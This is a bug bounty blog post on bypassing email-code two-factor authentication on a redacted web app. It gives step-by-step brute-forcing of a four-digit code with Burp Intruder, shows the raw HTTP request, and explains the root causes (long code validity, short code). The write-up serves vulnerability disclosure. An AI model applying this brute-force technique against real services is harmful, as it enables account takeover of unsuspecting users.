Open in app

Sign in

Write

Sign in

Two-Factor Authentication (2FA) Bypass

Saeid Khater
3 min readMay 23, 2024

--

Overview of the Vulnerability:

In cybersecurity, two-factor authentication (2FA) is one of the most effective ways to secure online accounts. This method adds an extra layer of security alongside a password, such as a code sent via SMS or an authenticator app. However, if two-factor authentication is not implemented properly, attackers can exploit vulnerabilities to bypass this layer of security.

Steps:

  1. Create account by email, I am using this email free@Palestine.com
  2. Now app send verification code to your email “free@Palestine.com” and you will be redirect to this page https://app.[Redacted].com/register/code-verification
Message in mailbox

3. write any random code, I used 5555 as 2FA

4. Enable a HTTP interception proxy, such as Burp Suite or OWASP ZAP

Request:

POST /api/auth/resolve-email-verification-code HTTP/2
Host: app.Redacted.com
Cookie: [Redacted]
Content-Length: 38
Sec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120"
Pragma: no-cache
Sec-Ch-Ua-Mobile: ?0
X-Site-Context: [Redacted]
User-Agent: [Redacted]
Content-Type: application/json
Accept: application/json, text/plain, */*
X-Client-Data: [Redacted]
Sec-Ch-Ua-Platform: "Linux"
Origin: [Redacted]
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: [Redacted]
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=1, i

{"email":"free@Palestine.com","code":5555}

5. I used the intruder in burp, select part of the verification code and my payload is a number from 0000 to 9999.

Intruder

6. After starting and few minutes i can bypass this code by valid code “6712”, and login was successful.

The site was also affected by the same vulnerability on another endpoint: https://app.[Redacted].com/login/code-verification
Which also allows you to bypass two-factor authentication

This is due to two reasons, even if there is a temporary ban “Rate limit” to confirm the verification code, but the code is valid for a time longer than the mentioned “10 minutes”.
The second reason is that the verification code must be 6 or more numbers or a combination of letters and numbers, depending on the secure design.

Impact

  1. Account Take over
  2. Creating a lot of fake accounts
  3. Consumption of server resources
  4. The cost of sending an email
  5. Reduce confidence

Duplicate ):

Cybersecurity
Bug Bounty

--

--

Saeid Khater
Saeid Khater

Written by Saeid Khater

107 Followers
13 Following

Web Developer | Penetration tester | Bug hunter

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams